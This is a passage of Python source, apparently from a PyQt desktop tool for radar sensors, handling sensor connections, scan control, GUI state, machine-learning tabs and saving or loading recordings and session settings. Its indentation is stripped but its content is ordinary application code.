param_gui_dict[element].setVisible(set_visible)
if "button" in element:
data_buttons = param_gui_dict
data_buttons["load_button"].setText(data_buttons["load_text"])
data_buttons["save_button"].setText(data_buttons["save_text"])
data_buttons["load_button"].setVisible(set_visible)
data_buttons["save_button"].setVisible(set_visible)
if param_gui_dict["advanced"]:
advanced_available = True
if start_up_mode is None:
if self.get_gui_state("ml_tab") == "main":
self.basic_processing_config_section.setVisible(bool(params))
if advanced_available:
self.advanced_processing_config_section.show()
self.advanced_processing_config_section.button_event(override=True)
else:
self.advanced_processing_config_section.hide()
def sensor_defaults_handler(self):
config = self.get_sensor_config()
if config is None:
return
default_config = self.current_module_info.sensor_config_class()
config._loads(default_config._dumps())
def service_defaults_handler(self):
processing_config = self.get_processing_config()
if isinstance(processing_config, configbase.Config):
processing_config._reset()
return
mode = self.current_module_label
if self.service_defaults is None:
return
for key in self.service_defaults:
if key in self.service_labels[mode]:
if "box" in self.service_labels[mode][key]:
self.service_labels[mode][key]["box"].setText(
str(self.service_defaults[key]["value"])
)
if "checkbox" in self.service_labels[mode][key]:
self.service_labels[mode][key]["checkbox"].setChecked(
bool(self.service_defaults[key]["value"])
)
def service_help_button_handler(self):
url = self.current_module_info.docs_url
_ = webbrowser.open_new_tab(url)
def update_canvas(self, force_update=False):
module_label = self.module_dd.currentText()
switching_module = self.current_module_label != module_label
self.current_module_label = module_label
self.current_module_info = MODULE_LABEL_TO_MODULE_INFO_MAP[module_label]
if self.current_module_info.module is None:
data_type = None
self.external = None
else:
data_type = self.current_module_info.sensor_config_class().mode
self.external = self.current_module_info.processor
switching_data_type = self.current_data_type != data_type
self.current_data_type = data_type
if switching_data_type:
self.data = None
self.session_info_view.update(None)
self.set_gui_state("load_state", LoadState.UNLOADED)
if force_update or switching_module:
if not switching_module:
self.update_service_params()
new_canvas = self.init_graphs(refresh=(not switching_module))
self.swap_canvas(new_canvas)
def swap_canvas(self, new_canvas):
if self.canvas is not None:
self.canvas_layout.removeWidget(self.canvas)
self.canvas.setParent(None)
self.canvas.deleteLater()
self.canvas_layout.addWidget(new_canvas)
self.canvas = new_canvas
def update_interface(self):
if self.gui_states["server_connected"]:
self.connect_to_server()
if "serial" in self.interface_dd.currentText().lower():
self.ports_dd.show()
self.textboxes["host"].hide()
self.buttons["advanced_port"].show()
self.buttons["scan_ports"].show()
self.update_ports()
elif "spi" in self.interface_dd.currentText().lower():
self.ports_dd.hide()
self.textboxes["host"].hide()
self.buttons["advanced_port"].hide()
self.buttons["scan_ports"].hide()
elif "socket" in self.interface_dd.currentText().lower():
self.ports_dd.hide()
self.textboxes["host"].show()
self.buttons["advanced_port"].hide()
self.buttons["scan_ports"].hide()
elif "simulated" in self.interface_dd.currentText().lower():
self.ports_dd.hide()
self.textboxes["host"].hide()
self.buttons["advanced_port"].hide()
self.buttons["scan_ports"].hide()
self.set_multi_sensors()
def error_message(self, text, info_text=None):
if self.under_test:
raise Exception
if not text:
return
message_box = BiggerMessageBox(self.main_widget)
message_box.setIcon(QtWidgets.QMessageBox.Warning)
message_box.setStandardButtons(QtWidgets.QMessageBox.Ok)
message_box.setWindowTitle("Alert")
message_box.setText(text.replace("\n", "<br>"))
if info_text:
message_box.setInformativeText(info_text.replace("\n", "<br>"))
if any(sys.exc_info()):
detailed_text = traceback.format_exc()
message_box.setDetailedText(detailed_text)
message_box.exec_()
def info_handle(self, info, detailed_info=None, blocking=True):
msg = QtWidgets.QMessageBox(self.main_widget)
msg.setIcon(QtWidgets.QMessageBox.Information)
msg.setText(info)
if detailed_info:
msg.setDetailedText(detailed_info)
msg.setWindowTitle("Info")
msg.setStandardButtons(QtWidgets.QMessageBox.Ok)
if blocking:
msg.exec_()
else:
msg.show()
return msg
def warning_message(self, warning, detailed_warning=None):
msg = QtWidgets.QMessageBox(self.main_widget)
msg.setIcon(QtWidgets.QMessageBox.Warning)
msg.setText(warning)
if detailed_warning:
msg.setDetailedText(detailed_warning)
msg.setWindowTitle("Warning")
msg.setStandardButtons(QtWidgets.QMessageBox.Ok | QtWidgets.QMessageBox.Cancel)
retval = msg.exec_()
return retval == 1024
def start_scan(self, from_file=False):
if not self.get_sensors():
self.error_message("Please select at least one sensor")
return
if self.current_module_info.module is None:
self.error_message("Please select a service or detector")
return
try:
sweep_buffer = int(self.textboxes["sweep_buffer"].text())
assert sweep_buffer > 0
except (ValueError, AssertionError):
self.textboxes["sweep_buffer"].setText(str("1000"))
self.error_message("Sweep buffer needs to be a positive integer")
return
sensor_config = self.get_sensor_config()
if from_file:
sensor_config._loads(self.data.sensor_config_dump)
self.set_gui_state("replaying_data", True)
self.update_canvas(force_update=True)
processing_config = self.update_service_params()
sensor_config = self.save_gui_settings_to_sensor_config()
params = {
"sensor_config": sensor_config,
"data_source": "file" if from_file else "stream",
"module_info": self.current_module_info,
"sweep_buffer": sweep_buffer,
"service_params": processing_config,
"ml_settings": None,
"multi_sensor": self.current_module_info.multi_sensor,
"rss_version": getattr(self, "rss_version", None),
}
ml_tab = self.get_gui_state("ml_tab")
if ml_tab != "main":
if not (self.ml_state.get_ml_settings_for_scan(ml_tab, params)):
return
self.threaded_scan = Threaded_Scan(params, parent=self)
self.threaded_scan.sig_scan.connect(self.thread_receive)
self.sig_scan.connect(self.threaded_scan.receive)
self.module_dd.setEnabled(False)
self.num_recv_frames = 0
self.num_missed_frames = 0
self.measured_update_rate_fc.reset()
self.reset_missed_frame_text_time = None
self.threaded_scan.start()
if isinstance(processing_config, configbase.Config):
self.basic_processing_config_section.body_widget.setEnabled(True)
self.buttons["service_defaults"].setEnabled(False)
self.buttons["advanced_defaults"].setEnabled(False)
processing_config._state = configbase.Config.State.LIVE
else:
self.basic_processing_config_section.body_widget.setEnabled(False)
self.buttons["connect"].setEnabled(False)
self.enable_tabs(False)
self.set_gui_state("scan_is_running", True)
def set_gui_state(self, state, val):
if state in self.gui_states:
self.gui_states[state] = val
elif state is None:
pass
else:
print("{} is an unknown state!".format(state))
return
states = self.gui_states
# Visible, enabled, text
# Start button
self.buttons["start"].setEnabled(
all(
[
self.in_supported_mode or states["load_state"] == LoadState.LOADED,
not states["scan_is_running"],
not states["has_config_error"],
states["server_connected"] or states["load_state"] == LoadState.LOADED,
]
)
)
if states["load_state"] == LoadState.LOADED:
self.buttons["start"].setText("New measurement")
else:
self.buttons["start"].setText("Start measurement")
# Stop button
self.buttons["stop"].setEnabled(states["scan_is_running"])
# Save to file button
self.buttons["save_scan"].setEnabled(
all(
[
states["load_state"] != LoadState.UNLOADED,
not states["scan_is_running"],
]
)
)
# Load from file button
self.buttons["load_scan"].setEnabled(not states["scan_is_running"])
# Replay button
self.buttons["replay_buffered"].setEnabled(
all(
[
states["load_state"] != LoadState.UNLOADED,
not states["scan_is_running"],
]
)
)
# Data source
self.labels["data_source"].setVisible(
bool(states["load_state"] == LoadState.LOADED and self.data_source)
)
try:
text = "Loaded " + os.path.basename(self.data_source)
except Exception:
text = ""
if len(text) > 50:
text = text[:47] + "..."
self.labels["data_source"].setText(text)
# Sweep buffer
self.labels["sweep_buffer"].setVisible(states["load_state"] != LoadState.LOADED)
self.textboxes["sweep_buffer"].setVisible(states["load_state"] != LoadState.LOADED)
self.textboxes["sweep_buffer"].setEnabled(not states["scan_is_running"])
# Stored frames
if states["load_state"] == LoadState.LOADED:
text = "Number of frames"
else:
text = "Buffered frames"
self.labels["stored_frames"].setText(text)
try:
num_stored = len(self.data.data)
except Exception:
num_stored = 0
self.textboxes["stored_frames"].setText(str(num_stored))
# RSS version
lbl = self.labels["rssver"]
try:
strict_ver = states["connection_info"]["strict_version"]
except Exception:
strict_ver = None
if strict_ver is not None:
if strict_ver < StrictVersion(SDK_VERSION):
ver_mismatch = "RSS server"
elif strict_ver > StrictVersion(SDK_VERSION):
ver_mismatch = "Exploration Tool"
else:
ver_mismatch = None
text = "RSS v" + str(strict_ver)
if ver_mismatch:
text += " ({} upgrade recommended)".format(ver_mismatch)
lbl.setStyleSheet("QLabel {color: red}")
else:
lbl.setStyleSheet("")
lbl.setText(text)
lbl.show()
else:
lbl.hide()
# Unsupported mode warning
visible = self.in_supported_mode is not None and not self.in_supported_mode
self.labels["unsupported_mode"].setVisible(visible)
# Other
sensor_config = self.get_sensor_config()
if sensor_config:
if states["load_state"] == LoadState.LOADED:
sensor_config._state = configbase.Config.State.LOADED_READONLY
elif not states["scan_is_running"]:
sensor_config._state = configbase.Config.State.LOADED
else:
sensor_config._state = configbase.Config.State.LIVE
for sensor_widget in self.sensor_widgets.values():
sensor_widget.setEnabled(not states["scan_is_running"])
self.set_multi_sensors()
self.buttons["sensor_defaults"].setEnabled(not states["scan_is_running"])
if state == "server_connected":
connected = val
if connected:
self.buttons["connect"].setText("Disconnect")
self.buttons["connect"].setStyleSheet("QPushButton {color: red}")
self.buttons["advanced_port"].setEnabled(False)
self.set_multi_sensors()
else:
self.buttons["connect"].setText("Connect")
self.buttons["connect"].setStyleSheet("QPushButton {color: black}")
self.buttons["advanced_port"].setEnabled(True)
self.statusBar().showMessage("Not connected")
if state == "ml_tab":
tab = val
self.feature_sidepanel.select_mode(val)
self.server_section.hide()
self.basic_processing_config_section.hide()
self.basic_sensor_config_section.hide()
self.advanced_sensor_config_section.hide()
self.session_info_section.hide()
self.control_section.hide()
self.feature_section.hide()
self.textboxes["sweep_buffer_ml"].hide()
self.textboxes["sweep_buffer"].hide()
self.module_dd.show()
if tab == "main":
if states["server_connected"]:
self.basic_sensor_config_section.show()
self.advanced_sensor_config_section.show()
self.server_section.show()
self.control_section.show()
self.textboxes["sweep_buffer"].show()
self.panel_scroll_area_widget.setCurrentWidget(self.main_sublayout_widget)
self.session_info_section.show()
elif tab == "feature_select":
self.feature_section.button_event(override=False)
if states["server_connected"]:
self.basic_sensor_config_section.show()
self.advanced_sensor_config_section.show()
self.server_section.show()
self.feature_section.show()
self.panel_scroll_area_widget.setCurrentWidget(self.main_sublayout_widget)
self.set_sensors(self.get_sensors(widget_name="main"))
self.feature_select.check_limits()
elif tab == "feature_extract":
self.server_section.show()
self.control_section.show()
self.feature_section.button_event(override=False)
self.feature_section.show()
self.module_dd.hide()
self.buttons["start"].setText("Start extraction")
self.textboxes["sweep_buffer_ml"].show()
self.panel_scroll_area_widget.setCurrentWidget(self.main_sublayout_widget)
self.set_sensors(self.get_sensors(widget_name="main"))
if self.ml_feature_plot_widget is None:
self.feature_extract.init_graph()
self.ml_feature_plot_widget = self.feature_extract.plot_widget
elif tab == "feature_inspect":
self.panel_scroll_area_widget.setCurrentWidget(self.main_sublayout_widget)
self.feature_section.show()
self.feature_inspect.update_frame("frames", 1, init=True)
self.feature_inspect.update_sliders()
elif tab == "model_select":
self.panel_scroll_area_widget.setCurrentWidget(self.training_sidepanel)
elif tab == "train":
self.panel_scroll_area_widget.setCurrentWidget(self.training_sidepanel)
elif tab == "eval":
if states["server_connected"]:
self.basic_sensor_config_section.show()
self.advanced_sensor_config_section.show()
self.server_section.show()
self.control_section.show()
self.feature_section.show()
self.textboxes["sweep_buffer"].show()
self.panel_scroll_area_widget.setCurrentWidget(self.main_sublayout_widget)
if self.ml_eval_model_plot_widget is None:
self.eval_model.init_graph()
self.ml_eval_model_plot_widget = self.eval_model.plot_widget
if state == "ml_model_loaded":
allow_edit = not val
if self.ml_state.get_state("model_source") == "internal":
allow_edit = True
elif self.ml_state.get_state("model_source") is None:
allow_edit = True
self.set_gui_state("ml_sensor_settings_locked", val)
self.gui_states["ml_overwrite_settings"] = False
self.model_select.allow_layer_edit(allow_edit)
self.feature_select.allow_feature_edit(not val)
self.module_dd.setEnabled(not val)
if state == "ml_overwrite_settings":
if self.ml_state.get_state("settings_locked"):
warning = "Do you really want to unlock model settings?"
warning += "\nThis will use GUI values when saving or evaluationg the model!"
detailed = "The model might stop working, if you change sensor/feature settings!"
detailed += "\n When saving, GUI settings will be used to overwrite the settings!"
if self.warning_message(warning, detailed_warning=detailed):
self.feature_select.allow_feature_edit(True)
self.set_gui_state("ml_sensor_settings_locked", False)
if state == "ml_sensor_settings_locked":
self.basic_sensor_config_section.body_widget.setEnabled(not val)
self.advanced_sensor_config_section.body_widget.setEnabled(not val)
self.ml_state.set_state("settings_locked", val)
if states["ml_mode"] and hasattr(self, "feature_select"):
config_is_valid = self.feature_select.is_config_valid()
self.feature_select.buttons["start"].setEnabled(
all(
[
states["server_connected"] or states["load_state"] == LoadState.LOADED,
not states["scan_is_running"],
not states["has_config_error"],
config_is_valid,
]
)
)
self.feature_select.buttons["stop"].setEnabled(states["scan_is_running"])
self.feature_select.buttons["replay_buffered"].setEnabled(
all(
[
states["load_state"] != LoadState.UNLOADED,
not states["scan_is_running"],
config_is_valid,
]
)
)
self.feature_select.check_limits()
# Disable service help button if current_module_info does not have a docs_link.
self.buttons["service_help"].setEnabled(self.current_module_info.docs_url is not None)
if self.current_module_info.module is None:
tooltip_text = f"Get help with services on ReadTheDocs"
elif self.current_module_info.docs_url is not None:
tooltip_text = f'Get help with "{self.current_module_info.label}" on ReadTheDocs'
else:
tooltip_text = None
self.buttons["service_help"].setToolTip(tooltip_text)
def get_gui_state(self, state):
if state in self.gui_states:
return self.gui_states[state]
else:
print("{} is an unknown state!".format(state))
return
def stop_scan(self):
self.sig_scan.emit("stop", "", None)
if not self.get_gui_state("ml_sensor_settings_locked"):
self.module_dd.setEnabled(True)
self.buttons["connect"].setEnabled(True)
self.basic_processing_config_section.body_widget.setEnabled(True)
processing_config = self.get_processing_config()
if isinstance(processing_config, configbase.Config):
self.buttons["service_defaults"].setEnabled(True)
self.buttons["advanced_defaults"].setEnabled(True)
processing_config._state = configbase.Config.State.LOADED
self.set_gui_state("replaying_data", False)
self.enable_tabs(True)
self.set_gui_state("scan_is_running", False)
def set_log_level(self):
log_level = logging.INFO
if self.checkboxes["verbose"].isChecked():
log_level = logging.DEBUG
utils.set_loglevel(log_level)
def connect_to_server(self):
if not self.get_gui_state("server_connected"):
if self.interface_dd.currentText().lower() == "socket":
host = self.textboxes["host"].text()
self.client = clients.SocketClient(host)
statusbar_connection_info = "socket ({})".format(host)
elif self.interface_dd.currentText().lower() == "spi":
self.client = clients.SPIClient()
statusbar_connection_info = "SPI"
elif self.interface_dd.currentText().lower() == "simulated":
self.client = clients.MockClient()
statusbar_connection_info = "simulated interface"
else:
port = self.ports_dd.currentText()
if not port:
self.error_message("Please select port first!")
return
port, *_ = port.split(" ")
if self.override_baudrate:
print("Warning: Overriding baudrate ({})!".format(self.override_baudrate))
self.client = clients.UARTClient(port, override_baudrate=self.override_baudrate)
statusbar_connection_info = "UART ({})".format(port)
self.client.squeeze = False
try:
info = self.client.connect()
except Exception:
text = "Could not connect to server"
info_text = None
if isinstance(self.client, clients.UARTClient):
info_text = (
"Did you select the right COM port?"
" Try unplugging and plugging back in the module!"
)
self.error_message(text, info_text=info_text)
return
self.rss_version = info.get("version_str", None)
connected_sensors = [1] # for the initial set
self.sensors_available = [1] # for the sensor widget(s)
if isinstance(self.client, clients.SocketClient):
sensor_count = min(info.get("board_sensor_count", 4), 4)
self.sensors_available = list(range(1, sensor_count + 1))
if sensor_count > 1:
config = configs.SparseServiceConfig()
connected_sensors = []
for i in range(sensor_count):
sensor = i + 1
config.sensor = sensor
try:
self.client.start_session(config)
self.client.stop_session()
except clients.base.SessionSetupError:
pass
except Exception:
self.error_message("Could not connect to server")
return
else:
connected_sensors.append(sensor)
elif isinstance(self.client, clients.MockClient):
self.sensors_available = list(range(1, 5))
if not connected_sensors:
self.error_message("No sensors connected, check connections")
try:
self.client.disconnect()
except Exception:
pass
return
if not self.get_gui_state("ml_sensor_settings_locked"):
self.set_sensors(connected_sensors)
self.set_gui_state("server_connected", True)
self.set_gui_state("load_state", LoadState.UNLOADED)
self.set_gui_state("connection_info", info)
self.statusBar().showMessage("Connected via {}".format(statusbar_connection_info))
if self.current_module_info.module is None:
self.module_dd.setCurrentIndex(1)
else:
self.sensors_available = None
self.set_gui_state("server_connected", False)
self.set_gui_state("connection_info", None)
self.sig_scan.emit("stop", "", None)
try:
self.client.stop_session()
except Exception:
pass
try:
self.client.disconnect()
except Exception:
pass
def load_gui_settings_from_sensor_config(self, config=None): # TODO
return
def save_gui_settings_to_sensor_config(self): # TODO
return self.get_sensor_config()
def update_service_params(self):
if isinstance(self.get_processing_config(), configbase.Config):
return self.get_processing_config()
errors = []
mode = self.current_module_label
if mode not in self.service_labels:
return None
for key in self.service_labels[mode]:
entry = self.service_labels[mode][key]
if "box" in entry:
er = False
val = self.is_float(entry["box"].text(), is_positive=False)
limits = entry["limits"]
default = entry["default"]
if val is not False:
val, er = self.check_limit(
val, entry["box"], limits[0], limits[1], set_to=default
)
else:
er = True
val = default
entry["box"].setText(str(default))
if er:
errors.append(
"{:s} must be between {:s} and {:s}!\n".format(
key, str(limits[0]), str(limits[1])
)
)
self.service_params[key]["value"] = self.service_params[key]["type"](val)
elif "checkbox" in entry:
self.service_params[key]["value"] = entry["checkbox"].isChecked()
if "send_process_data" in key:
if self.advanced_process_data["use_data"]:
if self.advanced_process_data["process_data"] is not None:
data = self.advanced_process_data["process_data"]
self.service_params["send_process_data"]["value"] = data
else:
data = self.service_params["send_process_data"]["text"]
print(data + " data not available")
else:
self.service_params["send_process_data"]["value"] = None
if len(errors):
self.error_message("".join(errors))
return self.service_params
def is_float(self, val, is_positive=True):
try:
f = float(val)
if is_positive and f <= 0:
raise ValueError("Not positive")
return f
except Exception:
return False
def check_limit(self, val, field, start, end, set_to=None):
out_of_range = False
try:
float(val)
except (ValueError, TypeError):
val = start
out_of_range = True
if val < start:
val = start
out_of_range = True
if val > end:
val = end
out_of_range = True
if out_of_range:
if set_to is not None:
val = set_to
field.setText(str(val))
return val, out_of_range
def load_scan(self, restart=False):
if restart:
self.set_gui_state("load_state", LoadState.LOADED)
self.start_scan(from_file=True)
return
options = QtWidgets.QFileDialog.Options()
options |= QtWidgets.QFileDialog.DontUseNativeDialog
filename, _ = QtWidgets.QFileDialog.getOpenFileName(
self,
"Load scan",
"",
"HDF5 data files (*.h5);; NumPy data files (*.npz)",
options=options,
)
if not filename:
return
try:
record = recording.load(filename)
except Exception:
traceback.print_exc()
self.error_message(
(
"Failed to load file"
"\n\n"
"Note: loading data fetched with RSS v1 is not supported."
"To load old data, please use an older version of the Exploration Tool."
)
)
return
try:
if record.module_key is None:
raise Exception
module_info = MODULE_KEY_TO_MODULE_INFO_MAP[record.module_key]
index = self.module_dd.findText(module_info.label, QtCore.Qt.MatchFixedString)
except Exception:
has_loaded_module = False
print("Can't find the module for the loaded data")
else:
has_loaded_module = index != -1
if not has_loaded_module: # Just try loading the data in the service-only module
try:
module_info = MODULE_KEY_TO_MODULE_INFO_MAP[record.mode.name.lower()]
index = self.module_dd.findText(module_info.label, QtCore.Qt.MatchFixedString)
except Exception:
self.error_message("Unknown mode in loaded file")
return
self.module_dd.setCurrentIndex(index)
self.update_canvas()
self.data = record
sensor_config = self.get_sensor_config()
sensor_config._loads(record.sensor_config_dump)
# Order is important for the following 3 calls
self.set_multi_sensors()
self.set_sensors(sensor_config.sensor)
self.set_gui_state("load_state", LoadState.LOADED)
if has_loaded_module:
processing_config = self.get_processing_config()
if isinstance(processing_config, configbase.ProcessingConfig):
if record.processing_config_dump is not None:
try:
processing_config._loads(record.processing_config_dump)
except Exception:
traceback.print_exc()
else:
try:
self.load_legacy_processing_config_dump(record)
except Exception:
traceback.print_exc()
self.data_source = filename
self.start_scan(from_file=True)
def save_scan(self, record):
if len(record.data) == 0:
self.error_message("No data to save")
return
options = QtWidgets.QFileDialog.Options()
options |= QtWidgets.QFileDialog.DontUseNativeDialog
title = "Save scan"
file_types = "HDF5 data files (*.h5);; NumPy data files (*.npz)"
filename, info = QtWidgets.QFileDialog.getSaveFileName(
self, title, "", file_types, options=options
)
if not filename:
return
record.mode = self.get_sensor_config().mode
record.module_key = self.current_module_info.key
record.processing_config_dump = None
record.legacy_processing_config_dump = None
processing_config = self.get_processing_config()
if isinstance(processing_config, configbase.Config):
record.processing_config_dump = processing_config._dumps()
else:
try:
self.save_legacy_processing_config_dump_to_record(record)
except Exception:
traceback.print_exc()
try:
if "h5" in info:
recording.save_h5(filename, record)
else:
recording.save_npz(filename, record)
except Exception as e:
traceback.print_exc()
self.error_message("Failed to save file:\n {:s}".format(e))
def load_legacy_processing_config_dump(self, record):
try:
d = json.loads(record.legacy_processing_config_dump)
except Exception:
return
assert isinstance(self.get_processing_config(), dict)
for k, v in d.items():
try:
param = self.service_params[k]
objtype = param.get("type", None)
if objtype is None:
continue
v = objtype(v)
self.service_params[k]["value"] = v
box = self.service_labels[self.current_module_info.label][k]["box"]
box.setText(str(v))
except Exception:
traceback.print_exc()
def save_legacy_processing_config_dump_to_record(self, record):
if not (self.service_params and isinstance(self.service_params, dict)):
return
d = {}
for key in self.service_params:
if key == "processing_handle":
continue
try:
val = self.service_params[key]["value"]
json.dumps(val) # Make sure it's serializable
d[key] = val
except Exception:
traceback.print_exc()
if d:
record.legacy_processing_config_dump = json.dumps(d)
def handle_advanced_process_data(self, action=None):
load_text = self.buttons["load_process_data"].text()
try:
data_text = self.service_params["send_process_data"]["text"]
except Exception as e:
print("Function not available! \n{}".format(e))
return
if action == "save":
if self.advanced_process_data["process_data"] is not None:
options = QtWidgets.QFileDialog.Options()
options |= QtWidgets.QFileDialog.DontUseNativeDialog
title = "Save " + load_text
file_types = "NumPy data files (*.npy)"
fname, info = QtWidgets.QFileDialog.getSaveFileName(
self, title, "", file_types, options=options
)
if fname:
try:
np.save(fname, self.advanced_process_data["process_data"])
except Exception as e:
self.error_message("Failed to save " + load_text + "{}".format(e))
return
self.advanced_process_data["use_data"] = True
self.buttons["load_process_data"].setText(load_text.replace("Load", "Unload"))
self.buttons["load_process_data"].setStyleSheet("QPushButton {color: red}")
else:
self.error_message(data_text + " data not availble!".format())
elif action == "load":
loaded = False
if "Unload" not in load_text:
mode = self.current_module_label
dialog = HandleAdvancedProcessData(mode, data_text, self)
dialog.exec_()
data = dialog.get_data()
if data is not None:
loaded = True
dialog.deleteLater()
if loaded:
self.advanced_process_data["use_data"] = True
self.advanced_process_data["process_data"] = data
self.buttons["load_process_data"].setText(load_text.replace("Load", "Unload"))
self.buttons["load_process_data"].setStyleSheet("QPushButton {color: red}")
else:
self.buttons["load_process_data"].setText(load_text.replace("Unload", "Load"))
self.buttons["load_process_data"].setStyleSheet("QPushButton {color: black}")
self.advanced_process_data["use_data"] = False
self.advanced_process_data["process_data"] = None
else:
print("Process data action not implemented")
def thread_receive(self, message_type, message, data=None):
if "error" in message_type:
if message_type == "session_setup_error":
error = "Failed to setup session (bad config)!\n"
if "socket" in self.interface_dd.currentText().lower():
error += "Check that selected sensors are connected and working!\n"
error += "Check Streaming server log for erros!"
self.error_message(error)
elif "client" in message_type:
self.stop_scan()
if self.get_gui_state("server_connected"):
self.connect_to_server()
elif "proccessing" in message_type:
self.stop_scan()
self.error_message("{}".format(message))
elif message_type == "scan_data":
if self.get_gui_state("load_state") != LoadState.LOADED:
self.data = data
self.data_source = None
self.set_gui_state("load_state", LoadState.BUFFERED)
elif message_type == "scan_done":
self.stop_scan()
elif "update_external_plots" in message_type:
if data is not None:
self.update_external_plots(data)
elif "sweep_info" in message_type:
self.update_sweep_info(data)
elif "session_info" in message_type:
self.session_info = data
self.reload_pg_updater(session_info=data)
self.session_info_view.update(self.session_info)
elif "process_data" in message_type:
self.advanced_process_data["process_data"] = data
elif "set_sensors" in message_type:
self.set_sensors(data)
else:
print("Thread data not implemented!")
print(message_type, message, data)
def update_external_plots(self, data):
if isinstance(data, dict) and data.get("ml_plotting") is True:
if self.get_gui_state("ml_tab") == "feature_extract":
self.ml_feature_plot_widget.update(data)
elif self.get_gui_state("ml_tab") == "feature_select":
self.feature_select.plot_feature(data)
elif self.get_gui_state("ml_tab") == "eval":
self.ml_eval_model_plot_widget.update(data)
self.ml_data = data
else:
self.plot_queue.append(data)
def plot_timer_fun(self):
if not self.plot_queue:
return
data, *self.plot_queue = self.plot_queue[-2:]
self.service_widget.update(data)
def update_sweep_info(self, infos):
if not isinstance(infos, list): # If squeezed
infos = [infos]
missed = any([e.get("missed_data", False) for e in infos])
saturated = any([e.get("data_saturated", False) for e in infos])
data_quality_warning = any([e.get("data_quality_warning", False) for e in infos])
if missed:
self.num_missed_frames += 1
self.num_recv_frames += 1
show_lim = int(1e6)
num_missed_show = min(self.num_missed_frames, show_lim)
missed_sym = ">" if num_missed_show >= show_lim else ""
num_recv_show = min(self.num_recv_frames, show_lim)
recv_sym = ">" if num_recv_show >= show_lim else ""
text = "Frames: {:s}{:d} (missed {:s}{:d})".format(
recv_sym,
num_recv_show,
missed_sym,
num_missed_show,
)
self.labels["sweep_info"].setText(text)
tick_info = self.measured_update_rate_fc.tick_values()
if tick_info is not None:
_, f, _ = tick_info
self.labels["measured_update_rate"].setText(f"{f:>10.1f} Hz")
RED_TEXT_TIMEOUT = 2
now = time.time()
if missed:
self.labels["sweep_info"].setStyleSheet("QLabel {color: red}")
self.reset_missed_frame_text_time = now + RED_TEXT_TIMEOUT
if self.reset_missed_frame_text_time is None or self.reset_missed_frame_text_time < now:
self.labels["sweep_info"].setStyleSheet("")
if data_quality_warning:
self.labels["data_warnings"].setText("Warning: Bad data quality, restart service!")
elif saturated:
self.labels["data_warnings"].setText("Warning: Data saturated, reduce gain!")
self.labels["data_warnings"].setVisible(saturated or data_quality_warning)
if self.get_gui_state("load_state") != LoadState.LOADED:
try:
text = str(min(self.num_recv_frames, int(self.textboxes["sweep_buffer"].text())))
except Exception:
text = ""
self.textboxes["stored_frames"].setText(text)
def start_up(self):
if not self.under_test:
if os.path.isfile(self.LAST_CONF_FILENAME):
try:
last = np.load(self.LAST_CONF_FILENAME, allow_pickle=True)
self.load_last_config(last.item())
except Exception as e:
print("Could not load settings from last session\n{}".format(e))
if os.path.isfile(self.LAST_ML_CONF_FILENAME) and self.get_gui_state("ml_mode"):
try:
last = np.load(self.LAST_ML_CONF_FILENAME, allow_pickle=True)
self.feature_select.update_feature_list(last.item()["feature_list"])
self.feature_sidepanel.set_frame_settings(last.item()["frame_settings"])
self.model_select.update_layer_list(last.item()["model_layers"])
self.feature_sidepanel.last_folder = last.item().get("last_folder", None)
except Exception as e:
print("Could not load ml settings from last session\n{}".format(e))
def load_last_config(self, last_config):
# Restore sensor configs (configbase)
dumps = last_config.get("sensor_config_dumps", {})
for key, conf in self.module_label_to_sensor_config_map.items():
if key in dumps:
dump = last_config["sensor_config_dumps"][key]
try:
conf._loads(dump)
except Exception:
print("Could not load sensor config for '{}'".format(key))
conf._reset() # TODO: load module defaults
# Restore processing configs (configbase)
dumps = last_config.get("processing_config_dumps", {})
for key, conf in self.module_label_to_processing_config_map.items():
if key in dumps:
dump = last_config["processing_config_dumps"][key]
try:
conf._loads(dump)
except Exception:
print("Could not load processing config for '{}'".format(key))
conf._reset()
# Restore misc. settings
self.textboxes["sweep_buffer"].setText(last_config["sweep_buffer"])
self.interface_dd.setCurrentIndex(last_config["interface"])
self.ports_dd.setCurrentIndex(last_config["port"])
self.textboxes["host"].setText(last_config["host"])
if last_config.get("override_baudrate"):
self.override_baudrate = last_config["override_baudrate"]
# Restore processing configs (legacy)
if last_config["service_settings"]:
for module_label in last_config["service_settings"]:
processing_config = self.get_default_processing_config(module_label)
if not processing_config:
continue
if isinstance(processing_config, configbase.Config):
continue
self.add_params(processing_config, start_up_mode=module_label)
labels = last_config["service_settings"][module_label]
for key in labels:
if "checkbox" in labels[key]:
checked = labels[key]["checkbox"]
self.service_labels[module_label][key]["checkbox"].setChecked(checked)
elif "box" in labels[key]:
text = str(labels[key]["box"])
self.service_labels[module_label][key]["box"].setText(text)
def closeEvent(self, event=None):
# Legacy processing params
service_params = {}
for mode in self.service_labels:
if service_params.get(mode) is None:
service_params[mode] = {}
for key in self.service_labels[mode]:
if service_params[mode].get(key) is None:
service_params[mode][key] = {}
if "checkbox" in self.service_labels[mode][key]:
checked = self.service_labels[mode][key]["checkbox"].isChecked()
service_params[mode][key]["checkbox"] = checked
elif "box" in self.service_labels[mode][key]:
val = self.service_labels[mode][key]["box"].text()
service_params[mode][key]["box"] = val
sensor_config_dumps = {}
for module_label, config in self.module_label_to_sensor_config_map.items():
try:
sensor_config_dumps[module_label] = config._dumps()
except AttributeError:
pass
processing_config_dumps = {}
for module_label, config in self.module_label_to_processing_config_map.items():
try:
processing_config_dumps[module_label] = config._dumps()
except AttributeError:
pass
last_config = {
"sensor_config_dumps": sensor_config_dumps,
"processing_config_dumps": processing_config_dumps,
"host": self.textboxes["host"].text(),
"sweep_buffer": self.textboxes["sweep_buffer"].text(),
"interface": self.interface_dd.currentIndex(),
"port": self.ports_dd.currentIndex(),
"service_settings": service_params,
"override_baudrate": self.override_baudrate,
}
if not self.under_test:
np.save(self.LAST_CONF_FILENAME, last_config, allow_pickle=True)
if self.get_gui_state("ml_mode"):
try:
last_ml_config = {
"feature_list": self.feature_select.get_feature_list(),
"frame_settings": self.feature_sidepanel.get_frame_settings(),
"model_layers": self.model_select.get_layer_list(
include_inactive_layers=True
),
"last_folder": self.feature_sidepanel.last_folder,
}
except Exception:
pass
else:
np.save(self.LAST_ML_CONF_FILENAME, last_ml_config, allow_pickle=True)
try:
self.client.disconnect()
except Exception:
pass
self.close()
def get_sensor_config(self):
module_info = self.current_module_info
if module_info.module is None:
return None
module_label = module_info.label
config = self.module_label_to_sensor_config_map[module_label]
if len(self.get_sensors()):
config.sensor = self.get_sensors()
else:
config.sensor = [1]
self.set_sensors([1])
return config
def get_processing_config(self, module_label=None):
if module_label is None:
module_info = self.current_module_info
else:
module_info = MODULE_LABEL_TO_MODULE_INFO_MAP[module_label]
if module_info.module is None:
return None
